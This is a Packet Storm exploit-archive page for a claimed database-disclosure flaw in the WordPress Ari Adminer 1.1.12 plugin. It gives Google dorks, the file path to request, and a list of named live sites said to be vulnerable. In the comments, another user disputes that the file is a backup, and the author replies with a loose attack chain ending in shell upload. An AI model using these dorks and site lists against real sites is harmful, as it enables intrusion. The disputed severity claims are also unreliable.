what you don't know can hurt you

WordPress Ari Adminer 1.1.12 Database Disclosure

WordPress Ari Adminer 1.1.12 Database Disclosure
Posted Dec 6, 2018
Authored by KingSkrupellos

WordPress Ari Adminer plugin version 1.1.12 suffers from a database disclosure vulnerability.

tags | exploit, info disclosure
MD5 | 0d76fb25df6fb402c18b48e874d9ebb0

WordPress Ari Adminer 1.1.12 Database Disclosure

Change Mirror Download
#################################################################################################

# Exploit Title : WordPress Ari Adminer Plugins 1.1.12 Database Backup
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 06/12/2018
# Vendor Homepage : ari-soft.com ~ wordpress.org/plugins/ari-adminer/
# Software Download Link : downloads.wordpress.org/plugin/ari-adminer.zip
+ github.com/andrewcy86/ari-adminer/archive/master.zip
+ ari-soft.com/Latest/wordpress-db-manager.html?_2018120603
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.1.12
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/ari-adminer/''
intext:''MAY=leeksperten ITAS - presisjon for perfeksjon'' site:no
intext:''A(c) 2018 M. Bradbury Photography''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/plugins/ari-adminer/install/install.sql

#################################################################################################

# Example Vulnerable Sites =>

[+]
mbradburyphotography.com/wp-content/plugins/ari-adminer/install/install.sql

[+]
clubjimmy.com/WordPress3/wp-content/plugins/ari-adminer/install/install.sql

[+] designbuildideas.eu/wp-content/plugins/ari-adminer/install/install.sql

[+] mygrapefruit.com/wp-content/plugins/ari-adminer/install/install.sql

[+] voleibol.pe/wp-content/plugins/ari-adminer/install/install.sql

[+] it-as.no/wp-content/plugins/ari-adminer/install/install.sql

[+] sapeople.com/wp-content/plugins/ari-adminer/install/install.sql

[+] waupacanow.com/wp-content/plugins/ari-adminer/install/install.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Comments (4)

RSS Feed Subscribe to this comment feed
vrana

This is not a database backup disclosure, this file is part of ARI Adminer and it is publicly available at github.com/andrewcy86/ari-admi…

Comment by vrana
2018-12-07 10:22:42 UTC | Permalink | Reply
vrana

Also your linkification is broken. This is the correct URL: github.com/andrewcy86/ari-admi…

Comment by vrana
2018-12-07 17:47:27 UTC | Permalink | Reply
kingskrupellos

Dear Vrana ;

No, you are wrong. This is a database backup disclosure. Yes, it should be a part of ARI Adminer plugin. Already I had given above the same information.

Read CWE 530 => cwe.mitre.org/data/definitions/530.html

A backup file is stored in a directory that is accessible to actors outside of the intended control sphere.

At a minimum, an attacker who retrieves this file would have all the information contained in it, whether that be database calls, the format of parameters accepted by the application, or simply information regarding the architectural structure of your site.

If you read the article carefully. you will see that links are not broken

packetstormsecurity.com/files/download/150665/wpariadminer1112-disclose.txt

github.com/andrewcy86/ari-adminer/archive/master.zip

You can find this file yourself. We don't need to give everything. Just search it.

github.com/andrewcy86/ari-adminer/blob/master/install/install.sql

For example ; mysql.sql - pgsql.sql - sqlite3.sql => Vendor says that

The .sql files in this directory contain the code to create the tables for database caching.

If you're not using database caching, you can safely ignore these.

If you ARE using database caching, simply load the correct *.sql file into your database to set up the required tables.

Database Caching => en.wikipedia.org/wiki/Database_caching

Database caching is a process included in the design of computer applications which generate web pages on-demand (dynamically) by accessing backend databases.

When these applications are deployed on multi-tier environments that involve browser-based clients, web application servers and backend databases, middle-tier database caching is used to achieve high scalability and performance.

In a three tier architecture, the application software tier and data storage tier can be in different hosts. Throughput of an application can be limited by the network speed. This limitation can be minimized by having the database at the application tier. Because commercial database software makes extensive use of system resources, it is not always practical to have the application and the database at the same host. In this case, a more light-weight database application can be used to cache data from the commercial database management system.

Database caching improves scalability by distributing query workload from backend to multiple cheap front-end systems. It allows flexibility in the processing of data; for example, the data of Platinum customers can be cached while that of ordinary customers are not. Caching can improve availability of data, by providing continued service for applications that depend only on cached tables even if the backend server is unavailable. Another benefit is improved data access speeds brought about by locality of data and smoothing out load peaks by avoiding round-trips between middle-tier and data-tier

For example ; Let's say - you can do Reverse SQL injection using this database to capture admin username and password and login to dashboard - upload shell and capture whole server.

Please do not comment no more.

Search and use your brain.

Have a nice day.

Comment by kingskrupellos
2018-12-08 15:09:26 UTC | Permalink | Reply
vrana

install.sql is not a backup file, it's the installation script. Thus it couldn't qualify as Exposure of Backup File.

Comment by vrana
2018-12-09 10:47:53 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

January 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    15 Files
  • 2
    Jan 2nd
    15 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    1 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    24 Files
  • 8
    Jan 8th
    15 Files
  • 9
    Jan 9th
    16 Files
  • 10
    Jan 10th
    23 Files
  • 11
    Jan 11th
    17 Files
  • 12
    Jan 12th
    3 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    33 Files
  • 16
    Jan 16th
    23 Files
  • 17
    Jan 17th
    29 Files
  • 18
    Jan 18th
    15 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close